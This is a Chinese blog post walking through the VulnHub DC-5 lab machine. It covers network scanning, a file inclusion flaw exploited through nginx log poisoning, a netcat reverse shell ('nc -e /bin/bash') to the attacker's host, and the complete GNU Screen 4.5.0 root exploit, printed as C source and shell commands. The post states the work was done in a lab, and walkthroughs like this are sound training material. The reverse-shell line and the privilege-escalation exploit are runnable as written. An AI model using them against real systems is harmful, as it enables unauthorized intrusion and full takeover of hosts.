vulnhub渗透日记22：DC-5

最新推荐文章于 2024-07-25 23:51:24 发布

_WHOAM1

最新推荐文章于 2024-07-25 23:51:24 发布

阅读量70

点赞数

分类专栏： Vulnhub靶机渗透日记文章标签： web安全 linux

本文链接：https://blog.csdn.net/ericalezl/article/details/132631395

版权

Vulnhub靶机渗透日记专栏收录该内容

22 篇文章 0 订阅

订阅专栏

前言

⏰时间：2023.9.1
🗺️靶机地址：https://www.vulnhub.com/entry/dc-5,314/
⚠️文中涉及操作均在靶机模拟环境中完成，切勿未经授权用于真实环境。
🙏本人水平有限，如有错误望指正，感谢您的查阅！
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -sn 192.168.58.1/24        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:25 HKT
Nmap scan report for bogon (192.168.58.1)
Host is up (0.00043s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for bogon (192.168.58.2)
Host is up (0.00011s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for bogon (192.168.58.214)

┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap 192.168.58.214     
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:25 HKT
Nmap scan report for bogon (192.168.58.214)
Host is up (0.000050s latency).
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE
80/tcp  open  http
111/tcp open  rpcbind
MAC Address: 00:0C:29:65:F7:56 (VMware)

文件包含

访问80网站，唯一的一处功能点

在这里插入图片描述
存在文件包含

┌──(root㉿Erik)-[/home/eric/myfile]
└─# whatweb http://192.168.58.214               
http://192.168.58.214 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.6.2], IP[192.168.58.214], Title[Welcome], nginx[1.6.2]

getshell

站点用的nginx，一般日志路径在/var/log/nginx/access.log
在这里插入图片描述
访问时在ua头插入一句话，然后包含日志文件

提权root

用nc反弹shell到kali

nc -e /bin/bash 192.168.58.153 5555
script -qc bash /dev/null

查找suid权限

www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0

这里screen显示4.5.0版本
搜一下相关模块

┌──(root㉿Erik)-[~eric/myfile]
└─# searchsploit screen 4.5.0
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation                        | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)                  | linux/local/41152.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

根据41154.sh 的提示

cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell

提权到root，拿到flag
在这里插入图片描述